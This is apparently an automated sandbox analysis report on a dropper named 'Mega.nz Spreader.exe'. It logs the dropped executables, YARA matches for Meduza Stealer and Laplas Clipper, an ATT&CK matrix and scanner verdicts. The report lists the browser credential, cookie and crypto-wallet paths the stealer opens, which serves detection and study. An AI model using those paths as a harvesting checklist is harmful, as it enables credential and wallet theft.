Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lib.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66002 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\leaf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\api.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00E10AC2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00E10AC2

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DE0E60 GetUserNameW,

3_2_00DE0E60

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00E04380 GetTimeZoneInformation,

3_2_00E04380

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Laplas Clipper

Source: Yara match	File source: 00000011.00000002.3289763270.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svcupdater.exe PID: 2568, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match

File source: Process Memory Space: api.exe PID: 5656, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: api.exe, 00000003.00000003.2255435579.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\configr;
Source: api.exe, 00000003.00000002.2260553543.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\config47efd221b}LMEM
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: api.exe, 00000003.00000003.2255435579.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore
Source: api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\api.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Meduza Stealer

Source: Yara match

File source: Process Memory Space: api.exe PID: 5656, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B8F85610 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,		7_2_00007FF8B8F85610
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B8F845E8 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,		7_2_00007FF8B8F845E8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	34 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	221 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	31 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Mega.nz Spreader.exe	71%	ReversingLabs	Win32.Dropper.Dapato
Mega.nz Spreader.exe	100%	Avira	HEUR/AGEN.1342303
Mega.nz Spreader.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\api.exe	100%	Avira	TR/Meduza.A
C:\Users\user\AppData\Local\Temp\api.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\leaf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\libssl-1_1.dll	0%	ReversingLabs
